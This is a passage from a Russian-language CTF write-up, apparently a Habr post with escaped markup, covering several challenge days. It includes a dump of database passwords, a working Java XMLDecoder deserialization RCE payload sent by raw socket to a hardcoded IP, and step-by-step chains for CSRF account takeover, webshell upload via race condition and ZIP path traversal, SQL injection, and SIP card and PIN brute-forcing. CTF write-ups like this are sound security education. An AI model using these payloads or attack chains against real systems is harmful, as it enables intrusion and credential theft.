user: webappuser@localhost<\/p>\nwepapp.developers --------------------------------------- | id | username | password | --------------------------------------- | 0 | developer_Vasia | fpBA7BPlS8wJ | | 1 | developer_Jorik | 5FftW6Aua2ef | --------------------------------------- wepapp.goods ------------------------- | id | name | price | ------------------------- | 0 | potato | 40 | | 1 | apple | 100 | | 2 | carrot | 25 | | 3 | tomato | 120 | | 4 | pear | 70 | | 5 | tomato | 110 | | 12 | pear | 80 | | 13 | cucumber | 80 | ------------------------- wepapp.users ---------------------------- | id | username | password | ---------------------------- <\/code><\/pre>\n
5. RCE \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e xml (solve.php)<\/p>\n\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n\n<?php $x =<<<HTML <?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_05" class="java.beans.XMLDecoder"> \t<object id="_response" class="java.lang.String"> \t\t<string>Mode 1 to get a value<\/string> \t<\/object> \t<object id="runtime" class="java.lang.Runtime" method="getRuntime">\t \t\t<void id="process" method="exec"> \t\t\t<string>cat webapps\/flag.txt<\/string> \t\t<\/void> \t\t \t<\/object>\t \t \t<object idref="process"> \t\t<void id="inputStream" method="getInputStream"\/> \t<\/object> \t \t<object id="inputStreamReader" class="java.io.InputStreamReader"> \t\t<object idref="inputStream"\/> \t<\/object> \t<object id="bufferedReader" class="java.io.BufferedReader"> \t\t<object idref="inputStreamReader"\/> \t<\/object> \t \t<object idref="bufferedReader"> \t\t<void id="line1" method="readLine"\/> \t<\/object> \t<object idref="bufferedReader"> \t\t<void id="line2" method="readLine"\/> \t<\/object> \t<string id="response"> \t\t<object idref="line1"\/>\t\t \t\t<object idref="line2"\/>\t \t<\/string> \t<object class="org.restlet.Response" method="getCurrent">\t \t\t<void method ="setEntity"> \t\t\t<object idref = "response"\/> \t\t\t<object class = "org.restlet.data.MediaType" field="TEXT_HTML"><\/object> \t\t<\/void> \t<\/object>\t <\/java> HTML; do { $socket = fsockopen("107.170.122.167", 80); } while (!$socket); $packet = "POST \/ZN_HQ\/API\/prods HTTP\/1.0\\r\\n"; $packet.= "Content-Type: application\/x-java-serialized-object+xml\\r\\n"; $packet.= "Host: 107.170.122.167\\n"; $packet.= "Connection: Close\\r\\n"; $packet.= "Content-Length: ".strlen($x)."\\r\\n"; $packet.= "Authorization: Basic ZGV2ZWxvcGVyX1Zhc2lhOmZwQkE3QlBsUzh3Sg==\\r\\n"; $packet.= "\\r\\n"; $packet.= $x; fwrite($socket, $packet); while(!@feof($socket)) echo fread($socket, 4096); fclose($socket); ?> <\/code><\/pre>\n<\/div>\n<\/div>\n<\/blockquote>\n\u0414\u0435\u043d\u044c 4 \u2014 ILLOGICAL PHOTOGALLERY<\/h2>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n\n
During recon one can find content.0x3d.ru and dev.0x3d.ru (127.0.0.1) subdomains.<\/p>\n
Log in under your vk account through Burp Suite, take a link with auth token (?code=…) and navigate to it in the private tab. You’re now logged in as a privileged user, which can upload files.<\/p>\n
Login under your vk account through Burp Suite, take a link with auth token (?code=…), now make a page on your website, which loads 2 images (<img src=…): the first triggers logout CSRF (like \/logout), the second is you auth token link. Now send this link to the privileged user, he (the bot) will navigate it, and his account will be connected to your vk profile. Now you can login as a privileged user.<\/p>\n
Privileged user can upload avatar. "*.php" is disallowed, but ".jpg.php" is ok =) Where’s the shell? Hm, avatars are uploaded to content.0x3d.ru\/avatars, but they are converted into $hash.jpg. Let’s suppose file is first uploaded in the same dir and converted afterwards.
Take BurpSuite, launch 100 threads (GET \/avatars\/beched.jpg.php, Host: content.0x3d.ru) and upload beched.jpg.php. Wow, 200! Shit, plain-text\u2026 They disabled PHP execution in this dir, but anyway, this is dangerous bug.<\/p>\n
There was SQL injection in private messaging interface, you could exploit it using multi-INSERT and guessing fields. There was no file_priv and no flag, but there was a link to PoC auth bypass exploit by the author of task. I found a working copy of the task on that server =)<\/p>\n
So, we’ve got author’s testing server. Let’s log in and check SQL injection there. Wow, there’s file_priv=Y! Read the source code, read configs, no flag =(
But there’s something else in ZIP upload functionality:<\/p>\nelseif(preg_match('\/[.](ZIP)|(zip)|(RAR)|(rar)$\/',$_FILES['fupload']['name'])) { $avatar = 'avatars\/net-avatara.jpg'; $filename = $_FILES['fupload']['name']; $source = $_FILES['fupload']['tmp_name']; $target = $path_to_90_directory . $filename; move_uploaded_file($source, $target);\/\/\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u0430 \u0432 \u043f\u0430\u043f\u043a\u0443 $path_to_90_directory $command = 'python \/var\/www\/0x3d.ru\/zn1\/avatars\/unzip.py \/var\/www\/0x3d.ru\/zn1\/avatars\/'.$filename; $temp = exec($command, $output); } <\/code><\/pre>\n
Now let’s do what they want. Let’s upload shell into the docroot of content.0x3d.ru. We’ll do it with github.com\/ptoomey3\/evilarc<\/a>
Create a ZIP archive with path traversal, it we’ll be extracted to any directory you want (if it’s writable). Now we’ve got PHP-shell on content.0x3d.ru<\/p>\n
Command execution functions are disabled, but we can browse any directory with DirectoryIterator: ahack.ru\/releases\/glob_wrapper_open_basedir_exploit.php.txt<\/a>
BTW, putenv() and mail() are not disabled, but somehow command execution via library preload and triggering sendmail doesn’t work %)<\/p>\n
Remember dev.0x3d.ru? Let’s try it from the web-shell:
readfile(‘http:\/\/dev.0x3d.ru’);<\/p><\/blockquote>\n\u0414\u0435\u043d\u044c 5 \u2014 CRACKME <\/h2>\n
\u0414\u0435\u043d\u044c 6 \u2014 dr.glukyne<\/h2>\n
\u0412\u0440\u0430\u0439\u0442\u0430\u043f \u043e\u0442 dr.glukyne <\/p>\n\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n1) \u041f\u0440\u043e\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0438 \u0432\u0438\u0434\u0438\u043c \u0437\u0430\u0433\u043b\u0430\u0432\u043d\u0443\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u0431\u0430\u043d\u043a\u0430 \u0441 \u0444\u043e\u0440\u043c\u043e\u0439 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0438 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044e.<\/p>\n
2) \u0420\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u043c\u0441\u044f \u0432 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u0431\u0430\u043d\u043a\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043d\u043e\u043c\u0435\u0440 \u043a\u0430\u0440\u0442\u044b \u0438 PIN-\u043a\u043e\u0434.
3) \u041f\u043e\u0438\u0449\u0435\u043c SIP, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u043b\u043e\u043c\u0430\u0442\u044c:<\/p>\n$: nmap -p 5060 -T4 -A -v bank.defcon.su ..... PORT STATE SERVICE VERSION 5060\/tcp open sip-proxy Asterisk PBX 11.17.1 |_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE .......<\/code><\/pre>\n
4) \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u044d\u0442\u043e\u043c\u0443 \u0441\u0435\u0440\u0432\u0438\u0441\u0443.
\u041f\u043e\u0441\u043b\u0435 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u0431\u0440\u0443\u0442\u0430 \u0438 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442 test@bank.defcon.su c \u043f\u0430\u0440\u043e\u043b\u0435\u043c test<\/p>\n
\u041f\u043e\u0437\u0432\u043e\u043d\u0438\u043c \u043d\u0430 \u043d\u0435\u0433\u043e: s@bank.defcon.su \u0438 \u0443\u0441\u043b\u044b\u0448\u0438\u043c \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0435 \u043e\u0442 \u0431\u0430\u043d\u043a\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0442\u0438\u043f \u043a\u0430\u0440\u0442\u044b (Mastercard \u0438\u043b\u0438 Visa), \u043d\u0430\u0431\u0440\u0430\u0442\u044c \u0435\u0451 \u043d\u043e\u043c\u0435\u0440 \u0438 \u043f\u0438\u043d-\u043a\u043e\u0434. \u0415\u0441\u043b\u0438 \u0432\u0432\u0435\u0441\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u0430\u0440\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u0438 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438, \u0442\u043e \u0437\u0432\u043e\u043d\u043e\u043a \u043f\u0440\u0435\u043a\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f. \u0415\u0441\u043b\u0438 \u0432\u0432\u0435\u0441\u0442\u0438 \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 \u043f\u0438\u043d-\u043a\u043e\u0434, \u0442\u043e \u043f\u0440\u043e\u0441\u044f\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u0435\u0433\u043e \u0432\u0432\u043e\u0434. \u0415\u0441\u043b\u0438 \u0432\u0432\u0435\u0441\u0442\u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u043a\u0430\u0440\u0442\u044b, \u0442\u043e \u0435\u0433\u043e \u043f\u0440\u043e\u0441\u044f\u0442 \u0432\u0432\u0435\u0441\u0442\u0438 \u0437\u0430\u043d\u043e\u0432\u043e. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0431\u0440\u0443\u0442\u0438\u0442\u044c \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u043e\u043c\u0435\u0440 \u043a\u0430\u0440\u0442\u044b, \u0430 \u043f\u043e\u0442\u043e\u043c \u043f\u0438\u043d-\u043a\u043e\u0434.
5) \u0412 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Visa \u0438 Mastercard \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0440\u0430\u0437\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0443\u043c\u0435\u0440\u0430\u0446\u0438\u0438: en.wikipedia.org\/wiki\/Bank_card_number<\/a>
\u0412 Visa \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b \u043d\u043e\u043c\u0435\u0440\u0430 \u0434\u043b\u0438\u043d\u043e\u0439 13 \u0438\u043b\u0438 16 \u0446\u0438\u0444\u0440, \u0430 \u0432 Mastercard \u0442\u043e\u043b\u044c\u043a\u043e 16 \u0446\u0438\u0444\u0440. \u041f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438 \u043b\u0438\u0448\u043d\u0438\u0439 \u0440\u0430\u0437 \u043f\u043e\u0434\u0447\u0435\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u044d\u0442\u0443 \u0430\u043d\u043e\u043c\u0430\u043b\u0438\u044e \u0441 Visa.
6) \u041f\u043e\u0438\u0441\u043a \u0432 \u0418\u043d\u0435\u0442\u0435 \u0430\u0434\u0435\u043a\u0432\u0430\u0442\u043d\u044b\u0445 SIP-\u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f Python \u043d\u0435 \u0443\u0432\u0435\u043d\u0447\u0430\u043b\u0441\u044f \u0443\u0441\u043f\u0435\u0445\u043e\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c
\u0431\u0440\u0443\u0442\u0438\u0442\u044c \u043d\u043e\u043c\u0435\u0440\u0430 \u043a\u0430\u0440\u0442 Visa \u0432 \u0440\u0443\u0447\u043d\u0443\u044e, \u0447\u0442\u043e \u0437\u0430\u043d\u044f\u043b\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f. \u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0447\u0435\u0442\u044b\u0440\u0435 \u0446\u0438\u0444\u0440\u044b \u043d\u043e\u043c\u0435\u0440\u0430, \u0447\u0442\u043e \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0443\u043f\u0440\u043e\u0441\u0442\u0438\u043b\u043e \u043f\u0435\u0440\u0435\u0431\u043e\u0440. \u0422\u0430\u043a \u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435: \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0431\u0430\u043d\u043a\u0430 \u0443\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u0430\u0432\u0442\u043e\u0440\u0441\u0442\u0432\u043e \u0442\u0430\u0441\u043a\u0430 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0438\u0442 \u0433\u0440\u0443\u043f\u043f\u0430\u043c Defcon DC7499 \u0438 2600. \u041e\u0434\u043d\u0430\u043a\u043e \u0438\u0441\u043a\u043e\u043c\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u043c \u043e\u0442 7499 \u0438 2600.
7) \u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u2014 1215. \u0412 \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u0435\u0433\u043e \u0432\u0432\u043e\u0434 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u043e\u043b\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u043a\u0430\u0440\u0442\u044b: 4556796461215
\u0412 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0438 \u043d\u043e\u043c\u0435\u0440 \u043e\u0447\u0435\u043d\u044c \u043f\u043e\u043c\u043e\u0433\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0432\u043e\u043d\u043a\u0430 \u0432 Jitsi.
8) \u041e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c \u043f\u0438\u043d-\u043a\u043e\u0434. \u041e\u043f\u044f\u0442\u044c \u0432\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u043c \u043f\u0440\u043e 7499 \u0438 2600. \u0418 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e 2600 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442.
9) \u0412\u0432\u043e\u0434\u0438\u043c \u043d\u043e\u043c\u0435\u0440 \u043a\u0430\u0440\u0442\u044b \u0438 \u043f\u0438\u043d-\u043a\u043e\u0434 \u0432 \u0432\u0435\u0431-\u043c\u043e\u0440\u0434\u0443 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043e\u0434 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0444\u043b\u0430\u0433\u0430. <\/div>\n<\/div>\n\u0414\u0435\u043d\u044c 7 \u2014 mr_dawerty <\/h2>\n
\u0412\u043e\u0442 \u0442\u0430\u043a \u044d\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b\u043e \u0443 \u043d\u0430\u0441 \u0432 \u043e\u0444\u0438\u0441\u0435:<\/p>\n![\"image\"\/](\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/55d\/19a\/cb6\/55d19acb66c3c5c0035c35c7330c7c06.jpg\")
<\/p>\n
![\"image\"\/](\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/e11\/7f2\/a6a\/e117f2a6a617a5e40dfc3f6940987e98.png\")
<\/p>\nHardWare Village<\/h1>\n
\n
\n
<\/div>\n<\/p>\n\u041f\u0440\u0438\u0432\u0435\u0442!<\/h1>\n